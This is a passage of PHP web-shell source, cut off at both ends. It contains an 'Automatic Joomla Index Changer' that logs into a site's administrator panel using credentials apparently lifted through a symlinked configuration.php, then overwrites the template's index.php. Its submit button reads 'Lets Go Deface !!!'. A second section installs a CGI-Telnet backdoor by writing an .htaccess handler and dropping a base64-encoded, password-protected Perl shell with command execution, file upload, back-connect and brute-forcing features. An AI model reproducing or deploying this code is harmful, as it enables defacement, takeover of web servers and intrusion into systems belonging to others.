CURLOPT_URL, $url2);\r\n    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);\r\n    curl_setopt($ch, CURLOPT_HEADER, 1);\r\n    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);\r\n        curl_setopt($ch, CURLOPT_COOKIEJAR, $co);\r\n        curl_setopt($ch, CURLOPT_COOKIEFILE, $co);\r\n    $buffer = curl_exec($ch);\r\n    \r\n    $hidden=entre2v2($buffer ,\'<input type="hidden" name="\',\'" value="1"\',3);\r\n    \r\n    $url2=$site_url."/index.php";\r\n    $ch = curl_init();\r\n    curl_setopt($ch, CURLOPT_URL, $url2);\r\n    curl_setopt($ch, CURLOPT_POST, 1);\r\n    curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&".$hidden."=1");\r\n    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);\r\n    curl_setopt($ch, CURLOPT_HEADER, 0);\r\n    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);\r\n    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);\r\n    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);\r\n    $buffer = curl_exec($ch);\r\n    \r\n    $pos = strpos($buffer,"com_config");\r\n    \r\n    if($pos === false) {\r\n    echo("<br>[-] Login Error");\r\n    exit;\r\n    }\r\n    else {\r\n    echo("<br>[+] Login Successful");\r\n    }\r\n    ///////////////////////////\r\n    $url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;\r\n    $ch = curl_init();\r\n    curl_setopt($ch, CURLOPT_URL, $url2);\r\n    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);\r\n    curl_setopt($ch, CURLOPT_HEADER, 0);\r\n    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);\r\n        curl_setopt($ch, CURLOPT_COOKIEJAR, $co);\r\n        curl_setopt($ch, CURLOPT_COOKIEFILE, $co);\r\n    $buffer = curl_exec($ch);\r\n    \r\n    $hidden2=entre2v2($buffer ,\'<input type="hidden" name="\',\'" value="1"\',6);\r\n    \r\n    if($hidden2) {\r\n    echo("<br>[~] index.php file founded in Theme Editor");\r\n    }\r\n    else {\r\n    echo("<br>[-] index.php Not found in Theme Editor");\r\n    }\r\n    \r\n    echo("<br>[*] Updating Index.php .....");\r\n    $url2=$site_url."/index.php?option=com_templates&layout=edit";\r\n    $ch = curl_init();\r\n    curl_setopt($ch, CURLOPT_URL, $url2);\r\n    curl_setopt($ch, CURLOPT_POST, 1);\r\n    curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$h."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");\r\n    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);\r\n    curl_setopt($ch, CURLOPT_HEADER, 0);\r\n    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);\r\n        curl_setopt($ch, CURLOPT_COOKIEJAR, $co);\r\n        curl_setopt($ch, CURLOPT_COOKIEFILE, $co);\r\n    $buffer = curl_exec($ch);\r\n    \r\n    $pos = strpos($buffer,\'<dd class="message message fade">\');\r\n    if($pos === false) {\r\n    echo("<br>[-] Updating Index.php Error");\r\n    exit;\r\n    }\r\n    else {\r\n    echo("<br>[~] index.php successfully saved");\r\n    }\r\n    #################################################################\r\n    ######################      V1.5  END      ######################\r\n    #################################################################\r\n    \r\n    }\r\n    \r\n    }\r\n    \r\n    \r\n    function randomt() {\r\n    \r\n        $chars = "abcdefghijkmnopqrstuvwxyz023456789";\r\n        srand((double)microtime()*1000000);\r\n        $i = 0;\r\n        $pass = \'\' ;\r\n    \r\n        while ($i <= 7) {\r\n            $num = rand() % 33;\r\n            $tmp = substr($chars, $num, 1);\r\n            $pass = $pass . $tmp;\r\n            $i++;\r\n        }\r\n    \r\n        return $pass;\r\n    \r\n    }\r\n    \r\n    function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1)\r\n    \r\n    {\r\n    \r\n    $ar0=explode($marqueurDebutLien, $text);\r\n    $ar1=explode($marqueurFinLien, $ar0[$i]);\r\n    $ar=trim($ar1[0]);\r\n    return $ar;\r\n    }\r\n    \r\n    }?>\r\n    <center><br><br>\r\n    <font color="#00ff00" size=\'+3\'><b>+--=[ Automatic Joomla Index Changer ]=--+</b></font><br><br>\r\n    </center>\r\n    <center><b>\r\n    Link of symlink configuration.php of Joomla<br></b>\r\n    <FORM action=""  method="post">\r\n    <input type="hidden" name="form_action" value="1">\r\n     <input type="text" class="inputz" size="60" name="file" value="http://site.com/sym/home/user/public_html/configuration.php">\r\n    <br>\r\n    <br><b>\r\n    Admin Control panel url</b><br>\r\n    <input type="text" class="inputz" size="40" name="site_url" value="http://site/administrator"><br>\r\n    <br><b>\r\n    Your Index Code</b>\r\n    <br>\r\n    <TEXTAREA rows="20" align="center" style="background:black" cols="120" name="code"> your index code\r\n            </TEXTAREA>\r\n            <br>\r\n    <INPUT  class="inputzbut" type="submit" value="Lets Go Deface !!!" name="Submit">\r\n    </FORM>\r\n     </center>\r\n    <script language=JavaScript>m=\'%09%09%09%09%09%09%09%3C/td%3E%0A%09%09%09%09%09%09%3C/tr%3E%0A%09%09%09%09%09%3C/table%3E%0A%09%09%09%09%3C/td%3E%0A%3C/html%3E\';d=unescape(m);document.write(d);</script>\r\n\t<?php\r\n}\r\n ///////////////////////////////////////////////////////////////////////////\r\n \r\n elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'cgi2012\')) { \r\n echo "<center/><br/><b>\r\n +--==[ CGI-Telnet Version 1.3 ]==--+ \r\n </b><br><br>";\r\n \r\n \r\n    mkdir(\'cgi2012\', 0755);\r\n    chdir(\'cgi2012\');\r\n        $kokdosya = ".htaccess";\r\n        $dosya_adi = "$kokdosya";\r\n        $dosya = fopen ($dosya_adi , \'w\') or die ("Dosya a&#231;&#305;lamad&#305;!");\r\n        $metin = "AddHandler cgi-script .izo";    \r\n        fwrite ( $dosya , $metin ) ;\r\n        fclose ($dosya);\r\n$cgi2012 = \'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluCnVzZSBNSU1FOjpCYXNlNjQ7CiRWZXJzaW9uPSAiQ0dJLVRlbG5ldCBWZXJzaW9uIDEuMyI7CiRFZGl0UGVyc2lvbj0iPGZvbnQgc3R5bGU9J3RleHQtc2hhZG93OiAwcHggMHB4IDZweCByZ2IoMjU1LCAwLCAwKSwgMHB4IDBweCA1cHggcmdiKDMwMCwgMCwgMCksIDBweCAwcHggNXB4IHJnYigzMDAsIDAsIDApOyBjb2xvcjojZmZmZmZmOyBmb250LXdlaWdodDpib2xkOyc+YjM3NGsgLSBDR0ktVGVsbmV0PC9mb250PiI7CgokUGFzc3dvcmQgPSAiYmFuZHVuZ2tvdGFzYW1wYWgiOwkJCSMgQ2hhbmdlIHRoaXMuIFlvdSB3aWxsIG5lZWQgdG8gZW50ZXIgdGhpcwoJCQkJIyB0byBsb2dpbi4Kc3ViIElzX1dpbigpewoJJG9zID0gJnRyaW0oJEVOVnsiU0VSVkVSX1NPRlRXQVJFIn0pOwoJaWYoJG9zID1+IG0vd2luL2kpewoJCXJldHVybiAxOwoJfQoJZWxzZXsKCQlyZXR1cm4gMDsKCX0KfQokV2luTlQgPSAmSXNfV2luKCk7CQkJCSMgWW91IG5lZWQgdG8gY2hhbmdlIHRoZSB2YWx1ZSBvZiB0aGlzIHRvIDEgaWYKCQkJCQkJCQkjIHlvdSdyZSBydW5uaW5nIHRoaXMgc2NyaXB0IG9uIGEgV2luZG93cyBOVAoJCQkJCQkJCSMgbWFjaGluZS4gSWYgeW91J3JlIHJ1bm5pbmcgaXQgb24gVW5peCwgeW91CgkJCQkJCQkJIyBjYW4gbGVhdmUgdGhlIHZhbHVlIGFzIGl0IGlzLgoKJE5UQ21kU2VwID0gIiYiOwkJCQkjIFRoaXMgY2hhcmFjdGVyIGlzIHVzZWQgdG8gc2VwZXJhdGUgMiBjb21tYW5kcwoJCQkJCQkJCSMgaW4gYSBjb21tYW5kIGxpbmUgb24gV2luZG93cyBOVC4KCiRVbml4Q21kU2VwID0gIjsiOwkJCQkjIFRoaXMgY2hhcmFjdGVyIGlzIHVzZWQgdG8gc2VwZXJhdGUgMiBjb21tYW5kcwoJCQkJCQkJCSMgaW4gYSBjb21tYW5kIGxpbmUgb24gVW5peC4KCiRDb21tYW5kVGltZW91dER1cmF0aW9uID0gMTAwMDA7CSMgVGltZSBpbiBzZWNvbmRzIGFmdGVyIGNvbW1hbmRzIHdpbGwgYmUga2lsbGVkCgkJCQkJCQkJIyBEb24ndCBzZXQgdGhpcyB0byBhIHZlcnkgbGFyZ2UgdmFsdWUuIFRoaXMgaXMKCQkJCQkJCQkjIHVzZWZ1bCBmb3IgY29tbWFuZHMgdGhhdCBtYXkgaGFuZyBvciB0aGF0CgkJCQkJCQkJIyB0YWtlIHZlcnkgbG9uZyB0byBleGVjdXRlLCBsaWtlICJmaW5kIC8iLgoJCQkJCQkJCSMgVGhpcyBpcyB2YWxpZCBvbmx5IG9uIFVuaXggc2VydmVycy4gSXQgaXMKCQkJCQkJCQkjIGlnbm9yZWQgb24gTlQgU2VydmVycy4KCiRTaG93RHluYW1pY091dHB1dCA9IDE7CQkJIyBJZiB0aGlzIGlzIDEsIHRoZW4gZGF0YSBpcyBzZW50IHRvIHRoZQoJCQkJCQkJCSMgYnJvd3NlciBhcyBzb29uIGFzIGl0IGlzIG91dHB1dCwgb3RoZXJ3aXNlCgkJCQkJCQkJIyBpdCBpcyBidWZmZXJlZCBhbmQgc2VuZCB3aGVuIHRoZSBjb21tYW5kCgkJCQkJCQkJIyBjb21wbGV0ZXMuIFRoaXMgaXMgdXNlZnVsIGZvciBjb21tYW5kcyBsaWtlCgkJCQkJCQkJIyBwaW5nLCBzbyB0aGF0IHlvdSBjYW4gc2VlIHRoZSBvdXRwdXQgYXMgaXQKCQkJCQkJCQkjIGlzIGJlaW5nIGdlbmVyYXRlZC4KCiMgRE9OJ1QgQ0hBTkdFIEFOWVRISU5HIEJFTE9XIFRISVMgTElORSBVTkxFU1MgWU9VIEtOT1cgV0hBVCBZT1UnUkUgRE9JTkcgISEKCiRDbWRTZXAgPSAoJFdpbk5UID8gJE5UQ21kU2VwIDogJFVuaXhDbWRTZXApOwokQ21kUHdkID0gKCRXaW5OVCA/ICJjZCIgOiAicHdkIik7CiRQYXRoU2VwID0gKCRXaW5OVCA/ICJcXCIgOiAiLyIpOwokUmVkaXJlY3RvciA9ICgkV2luTlQgPyAiIDI+JjEgMT4mMiIgOiAiIDE+JjEgMj4mMSIpOwokY29scz0gMTUwOwokcm93cz0gMjY7CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBSZWFkcyB0aGUgaW5wdXQgc2VudCBieSB0aGUgYnJvd3NlciBhbmQgcGFyc2VzIHRoZSBpbnB1dCB2YXJpYWJsZXMuIEl0CiMgcGFyc2VzIEdFVCwgUE9TVCBhbmQgbXVsdGlwYXJ0L2Zvcm0tZGF0YSB0aGF0IGlzIHVzZWQgZm9yIHVwbG9hZGluZyBmaWxlcy4KIyBUaGUgZmlsZW5hbWUgaXMgc3RvcmVkIGluICRpbnsnZid9IGFuZCB0aGUgZGF0YSBpcyBzdG9yZWQgaW4gJGlueydmaWxlZGF0YSd9LgojIE90aGVyIHZhcmlhYmxlcyBjYW4gYmUgYWNjZXNzZWQgdXNpbmcgJGlueyd2YXInfSwgd2hlcmUgdmFyIGlzIHRoZSBuYW1lIG9mCiMgdGhlIHZhcmlhYmxlLiBOb3RlOiBNb3N0IG9mIHRoZSBjb2RlIGluIHRoaXMgZnVuY3Rpb24gaXMgdGFrZW4gZnJvbSBvdGhlciBDR0kKIyBzY3JpcHRzLgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBSZWFkUGFyc2UgCnsKCWxvY2FsICgqaW4pID0gQF8gaWYgQF87Cglsb2NhbCAoJGksICRsb2MsICRrZXksICR2YWwpOwoJCgkkTXVsdGlwYXJ0Rm9ybURhdGEgPSAkRU5WeydDT05URU5UX1RZUEUnfSA9fiAvbXVsdGlwYXJ0XC9mb3JtLWRhdGE7IGJvdW5kYXJ5PSguKykkLzsKCglpZigkRU5WeydSRVFVRVNUX01FVEhPRCd9IGVxICJHRVQiKQoJewoJCSRpbiA9ICRFTlZ7J1FVRVJZX1NUUklORyd9OwoJfQoJZWxzaWYoJEVOVnsnUkVRVUVTVF9NRVRIT0QnfSBlcSAiUE9TVCIpCgl7CgkJYmlubW9kZShTVERJTikgaWYgJE11bHRpcGFydEZvcm1EYXRhICYgJFdpbk5UOwoJCXJlYWQoU1RESU4sICRpbiwgJEVOVnsnQ09OVEVOVF9MRU5HVEgnfSk7Cgl9CgoJIyBoYW5kbGUgZmlsZSB1cGxvYWQgZGF0YQoJaWYoJEVOVnsnQ09OVEVOVF9UWVBFJ30gPX4gL211bHRpcGFydFwvZm9ybS1kYXRhOyBib3VuZGFyeT0oLispJC8pCgl7CgkJJEJvdW5kYXJ5ID0gJy0tJy4kMTsgIyBwbGVhc2UgcmVmZXIgdG8gUkZDMTg2NyAKCQlAbGlzdCA9IHNwbGl0KC8kQm91bmRhcnkvLCAkaW4pOyAKCQkkSGVhZGVyQm9keSA9ICRsaXN0WzFdOwoJCSRIZWFkZXJCb2R5ID1+IC9cclxuXHJcbnxcblxuLzsKCQkkSGVhZGVyID0gJGA7CgkJJEJvZHkgPSAkJzsKIAkJJEJvZHkgPX4gcy9cclxuJC8vOyAjIHRoZSBsYXN0IFxyXG4gd2FzIHB1dCBpbiBieSBOZXRzY2FwZQoJCSRpbnsnZmlsZWRhdGEnfSA9ICRCb2R5OwoJCSRIZWFkZXIgPX4gL2ZpbGVuYW1lPVwiKC4rKVwiLzsgCgkJJGlueydmJ30gPSAkMTsgCgkJJGlueydmJ30gPX4gcy9cIi8vZzsKCQkkaW57J2YnfSA9fiBzL1xzLy9nOwoKCQkjIHBhcnNlIHRyYWlsZXIKCQlmb3IoJGk9MjsgJGxpc3RbJGldOyAkaSsrKQoJCXsgCgkJCSRsaXN0WyRpXSA9fiBzL14uK25hbWU9JC8vOwoJCQkkbGlzdFskaV0gPX4gL1wiKFx3KylcIi87CgkJCSRrZXkgPSAkMTsKCQkJJHZhbCA9ICQnOwoJCQkkdmFsID1+IHMvKF4oXHJcblxyXG58XG5cbikpfChcclxuJHxcbiQpLy9nOwoJCQkkdmFsID1+IHMvJSguLikvcGFjaygiYyIsIGhleCgkMSkpL2dlOwoJCQkkaW57JGtleX0gPSAkdmFsOyAKCQl9Cgl9CgllbHNlICMgc3RhbmRhcmQgcG9zdCBkYXRhICh1cmwgZW5jb2RlZCwgbm90IG11bHRpcGFydCkKCXsKCQlAaW4gPSBzcGxpdCgvJi8sICRpbik7CgkJZm9yZWFjaCAkaSAoMCAuLiAkI2luKQoJCXsKCQkJJGluWyRpXSA9fiBzL1wrLyAvZzsKCQkJKCRrZXksICR2YWwpID0gc3BsaXQoLz0vLCAkaW5bJGldLCAyKTsKCQkJJGtleSA9fiBzLyUoLi4pL3BhY2soImMiLCBoZXgoJDEpKS9nZTsKCQkJJHZhbCA9fiBzLyUoLi4pL3BhY2soImMiLCBoZXgoJDEpKS9nZTsKCQkJJGlueyRrZXl9IC49ICJcMCIgaWYgKGRlZmluZWQoJGlueyRrZXl9KSk7CgkJCSRpbnska2V5fSAuPSAkdmFsOwoJCX0KCX0KfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgSFRNTCBQYWdlIEhlYWRlcgojIEFyZ3VtZW50IDE6IEZvcm0gaXRlbSBuYW1lIHRvIHdoaWNoIGZvY3VzIHNob3VsZCBiZSBzZXQKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgUHJpbnRQYWdlSGVhZGVyCnsKCSRFbmNvZGVkQ3VycmVudERpciA9ICRDdXJyZW50RGlyOwoJJEVuY29kZWRDdXJyZW50RGlyID1+IHMvKFteYS16QS1aMC05XSkvJyUnLnVucGFjaygiSCoiLCQxKS9lZzsKCW15ICRkaXIgPSRDdXJyZW50RGlyOwoJJGRpcj1+IHMvXFwvXFxcXC9nOwoJcHJpbnQgIkNvbnRlbnQtdHlwZTogdGV4dC9odG1sXG5cbiI7CglwcmludCA8PEVORDsKPGh0bWw+CjxoZWFkPgo8bWV0YSBodHRwLWVxdWl2PSJjb250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD1VVEYtOCI+Cjx0aXRsZT5IYWNzdWdpYTwvdGl0bGU+CgokSHRtbE1ldGFIZWFkZXIKCjwvaGVhZD4KPHN0eWxlPgpib2R5ewpmb250OiAxMHB0IFZlcmRhbmE7Cn0KdHIgewpCT1JERVItUklHSFQ6ICAjM2UzZTNlIDFweCBzb2xpZDsKQk9SREVSLVRPUDogICAgIzNlM2UzZSAxcHggc29saWQ7CkJPUkRFUi1MRUZUOiAgICMzZTNlM2UgMXB4IHNvbGlkOwpCT1JERVItQk9UVE9NOiAjM2UzZTNlIDFweCBzb2xpZDsKY29sb3I6ICNmZjk5MDA7Cn0KdGQgewpCT1JERVItUklHSFQ6ICAjM2UzZTNlIDFweCBzb2xpZDsKQk9SREVSLVRPUDogICAgIzNlM2UzZSAxcHggc29saWQ7CkJPUkRFUi1MRUZUOiAgICMzZTNlM2UgMXB4IHNvbGlkOwpCT1JERVItQk9UVE9NOiAjM2UzZTNlIDFweCBzb2xpZDsKY29sb3I6ICMyQkE4RUM7CmZvbnQ6IDEwcHQgVmVyZGFuYTsKfQoKdGFibGUgewpCT1JERVItUklHSFQ6ICAjM2UzZTNlIDFweCBzb2xpZDsKQk9SREVSLVRPUDogICAgIzNlM2UzZSAxcHggc29saWQ7CkJPUkRFUi1MRUZUOiAgICMzZTNlM2UgMXB4IHNvbGlkOwpCT1JERVItQk9UVE9NOiAjM2UzZTNlIDFweCBzb2xpZDsKQkFDS0dST1VORC1DT0xPUjogIzExMTsKfQoKCmlucHV0IHsKQk9SREVSLVJJR0hUOiAgIzNlM2UzZSAxcHggc29saWQ7CkJPUkRFUi1UT1A6ICAgICMzZTNlM2UgMXB4IHNvbGlkOwpCT1JERVItTEVGVDogICAjM2UzZTNlIDFweCBzb2xpZDsKQk9SREVSLUJPVFRPTTogIzNlM2UzZSAxcHggc29saWQ7CkJBQ0tHUk9VTkQtQ09MT1I6IEJsYWNrOwpmb250OiAxMHB0IFZlcmRhbmE7CmNvbG9yOiAjZmY5OTAwOwp9CgppbnB1dC5zdWJtaXQgewp0ZXh0LXNoYWRvdzogMHB0IDBwdCAwLjNlbSBjeWFuLCAwcHQgMHB0IDAuM2VtIGN5YW47CmNvbG9yOiAjRkZGRkZGOwpib3JkZXItY29sb3I6ICMwMDk5MDA7Cn0KCmNvZGUgewpib3JkZXIJCQk6IGRhc2hlZCAwcHggIzMzMzsKQkFDS0dST1VORC1DT0xPUjogQmxhY2s7CmZvbnQ6IDEwcHQgVmVyZGFuYSBib2xkOwpjb2xvcjogd2hpbGU7Cn0KCnJ1biB7CmJvcmRlcgkJCTogZGFzaGVkIDBweCAjMzMzOwpmb250OiAxMHB0IFZlcmRhbmEgYm9sZDsKY29sb3I6ICNGRjAwQUE7Cn0KCnRleHRhcmVhIHsKQk9SREVSLVJJR0hUOiAgIzNlM2UzZSAxcHggc29saWQ7CkJPUkRFUi1UT1A6ICAgICMzZTNlM2UgMXB4IHNvbGlkOwpCT1JERVItTEVGVDogICAjM2UzZTNlIDFweCBzb2xpZDsKQk9SREVSLUJPVFRPTTogIzNlM2UzZSAxcHggc29saWQ7CkJBQ0tHUk9VTkQtQ09MT1I6ICMxYjFiMWI7CmZvbnQ6IEZpeGVkc3lzIGJvbGQ7CmNvbG9yOiAjYWFhOwp9CkE6bGluayB7CglDT0xPUjogIzJCQThFQzsgVEVYVC1ERUNPUkFUSU9OOiBub25lCn0KQTp2aXNpdGVkIHsKCUNPTE9SOiAjMkJBOEVDOyBURVhULURFQ09SQVRJT046IG5vbmUKfQpBOmhvdmVyIHsKCXRleHQtc2hhZG93OiAwcHQgMHB0IDAuM2VtIGN5YW4sIDBwdCAwcHQgMC4zZW0gY3lhbjsKCWNvbG9yOiAjZmY5OTAwOyBURVhULURFQ09SQVRJT046IG5vbmUKfQpBOmFjdGl2ZSB7Cgljb2xvcjogUmVkOyBURVhULURFQ09SQVRJT046IG5vbmUKfQoKLmxpc3RkaXIgdHI6aG92ZXJ7CgliYWNrZ3JvdW5kOiAjNDQ0Owp9Ci5saXN0ZGlyIHRyOmhvdmVyIHRkewoJYmFja2dyb3VuZDogIzQ0NDsKCXRleHQtc2hhZG93OiAwcHQgMHB0IDAuM2VtIGN5YW4sIDBwdCAwcHQgMC4zZW0gY3lhbjsKCWNvbG9yOiAjRkZGRkZGOyBURVhULURFQ09SQVRJT046IG5vbmU7Cn0KLm5vdGxpbmV7CgliYWNrZ3JvdW5kOiAjMTExOwp9Ci5saW5lewoJYmFja2dyb3VuZDogIzIyMjsKfQo8L3N0eWxlPgo8c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0Ij4KZnVuY3Rpb24gY2htb2RfZm9ybShpLGZpbGUpCnsKCS8qdmFyIGFqYXg9J2FqYXhfUG9zdERhdGEoIkZvcm1QZXJtc18nK2krJyIsIiRTY3JpcHRMb2NhdGlvbiIsIlJlc3BvbnNlRGF0YSIpOyByZXR1cm4gZmFsc2U7JzsqLwoJdmFyIGFqYXg9IiI7Cglkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiRmlsZVBlcm1zXyIraSkuaW5uZXJIVE1MPSI8Zm9ybSBuYW1lPUZvcm1QZXJtc18iICsgaSsgIiBhY3Rpb249JycgbWV0aG9kPSdQT1NUJz48aW5wdXQgaWQ9dGV4dF8iICsgaSArICIgIG5hbWU9Y2htb2QgdHlwZT10ZXh0IHNpemU9NSAvPjxpbnB1dCB0eXBlPXN1Ym1pdCBjbGFzcz0nc3VibWl0JyBvbmNsaWNrPSciICsgYWpheCArICInIHZhbHVlPU9LPjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWEgdmFsdWU9J2d1aSc+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9ZCB2YWx1ZT0nJGRpcic+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9ZiB2YWx1ZT0nIitmaWxlKyInPjwvZm9ybT4iOwoJZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoInRleHRfIiArIGkpLmZvY3VzKCk7Cn0KZnVuY3Rpb24gcm1fY2htb2RfZm9ybShyZXNwb25zZSxpLHBlcm1zLGZpbGUpCnsKCXJlc3BvbnNlLmlubmVySFRNTCA9ICI8c3BhbiBvbmNsaWNrPVxcXCJjaG1vZF9mb3JtKCIgKyBpICsgIiwnIisgZmlsZSsgIicpXFxcIiA+IisgcGVybXMgKyI8L3NwYW4+PC90ZD4iOwp9CmZ1bmN0aW9uIHJlbmFtZV9mb3JtKGksZmlsZSxmKQp7Cgl2YXIgYWpheD0iIjsKCWYucmVwbGFjZSgvXFxcXC9nLCJcXFxcXFxcXCIpOwoJdmFyIGJhY2s9InJtX3JlbmFtZV9mb3JtKCIraSsiLFxcXCIiK2ZpbGUrIlxcXCIsXFxcIiIrZisiXFxcIik7IHJldHVybiBmYWxzZTsiOwoJZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoIkZpbGVfIitpKS5pbm5lckhUTUw9Ijxmb3JtIG5hbWU9Rm9ybVBlcm1zXyIgKyBpKyAiIGFjdGlvbj0nJyBtZXRob2Q9J1BPU1QnPjxpbnB1dCBpZD10ZXh0XyIgKyBpICsgIiAgbmFtZT1yZW5hbWUgdHlwZT10ZXh0IHZhbHVlPSAnIitmaWxlKyInIC8+PGlucHV0IHR5cGU9c3VibWl0IGNsYXNzPSdzdWJtaXQnIG9uY2xpY2s9JyIgKyBhamF4ICsgIicgdmFsdWU9T0s+PGlucHV0IHR5cGU9c3VibWl0IGNsYXNzPSdzdWJtaXQnIG9uY2xpY2s9JyIgKyBiYWNrICsgIicgdmFsdWU9Q2FuY2VsPjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWEgdmFsdWU9J2d1aSc+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9ZCB2YWx1ZT0nJGRpcic+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9ZiB2YWx1ZT0nIitmaWxlKyInPjwvZm9ybT4iOwoJZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoInRleHRfIiArIGkpLmZvY3VzKCk7Cn0KZnVuY3Rpb24gcm1fcmVuYW1lX2Zvcm0oaSxmaWxlLGYpCnsKCWlmKGY9PSdmJykKCXsKCQlkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiRmlsZV8iK2kpLmlubmVySFRNTD0iPGEgaHJlZj0nP2E9Y29tbWFuZCZkPSRkaXImYz1lZGl0JTIwIitmaWxlKyIlMjAnPiIgK2ZpbGUrICI8L2E+IjsKCX1lbHNlCgl7CgkJZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoIkZpbGVfIitpKS5pbm5lckhUTUw9IjxhIGhyZWY9Jz9hPWd1aSZkPSIrZisiJz5bICIgK2ZpbGUrICIgXTwvYT4iOwoJfQp9Cjwvc2NyaXB0Pgo8Ym9keSBvbkxvYWQ9ImRvY3VtZW50LmYuQF8uZm9jdXMoKSIgYmdjb2xvcj0iIzBjMGMwYyIgdG9wbWFyZ2luPSIwIiBsZWZ0bWFyZ2luPSIwIiBtYXJnaW53aWR0aD0iMCIgbWFyZ2luaGVpZ2h0PSIwIj4KPGNlbnRlcj48Y29kZT4KPHRhYmxlIGJvcmRlcj0iMSIgd2lkdGg9IjEwMCUiIGNlbGxzcGFjaW5nPSIwIiBjZWxscGFkZGluZz0iMiI+Cjx0cj4KCTx0ZCBhbGlnbj0iY2VudGVyIiByb3dzcGFuPTI+CgkJPGI+PGZvbnQgc2l6ZT0iNSI+JEVkaXRQZXJzaW9uPC9mb250PjwvYj4KCTwvdGQ+CgoJPHRkPgoKCQk8Zm9udCBmYWNlPSJWZXJkYW5hIiBzaXplPSIyIj4kRU5WeyJTRVJWRVJfU09GVFdBUkUifTwvZm9udD4KCTwvdGQ+Cgk8dGQ+U2VydmVyIElQOjxmb250IGNvbG9yPSIjY2MwMDAwIj4gJEVOVnsnU0VSVkVSX0FERFInfTwvZm9udD4gfCBZb3VyIElQOiA8Zm9udCBjb2xvcj0iIzAwMDAwMCI+JEVOVnsnUkVNT1RFX0FERFInfTwvZm9udD4KCTwvdGQ+Cgo8L3RyPgoKPHRyPgo8dGQgY29sc3Bhbj0iMyI+PGZvbnQgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+CjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbiI+SG9tZTwvYT4gfCAKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9Y29tbWFuZCZkPSRFbmNvZGVkQ3VycmVudERpciI+Q29tbWFuZDwvYT4gfAo8YSBocmVmPSIkU2NyaXB0TG9jYXRpb24/YT1ndWkmZD0kRW5jb2RlZEN1cnJlbnREaXIiPkdVSTwvYT4gfCAKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9dXBsb2FkJmQ9JEVuY29kZWRDdXJyZW50RGlyIj5VcGxvYWQgRmlsZTwvYT4gfCAKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9ZG93bmxvYWQmZD0kRW5jb2RlZEN1cnJlbnREaXIiPkRvd25sb2FkIEZpbGU8L2E+IHwKCjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbj9hPWJhY2tiaW5kIj5CYWNrICYgQmluZDwvYT4gfAo8YSBocmVmPSIkU2NyaXB0TG9jYXRpb24/YT1icnV0ZWZvcmNlciI+QnJ1dGUgRm9yY2VyPC9hPiB8CjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbj9hPWNoZWNrbG9nIj5DaGVjayBMb2c8L2E+IHwKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9ZG9tYWluc3VzZXIiPkRvbWFpbnMvVXNlcnM8L2E+IHwKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9bG9nb3V0Ij5Mb2dvdXQ8L2E+IHwKPGEgdGFyZ2V0PSdfYmxhbmsnIGhyZWY9IiMiPkhlbHA8L2E+Cgo8L2ZvbnQ+PC90ZD4KPC90cj4KPC90YWJsZT4KPGZvbnQgaWQ9IlJlc3BvbnNlRGF0YSIgY29sb3I9IiNmZjk5Y2MiID4KRU5ECn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tL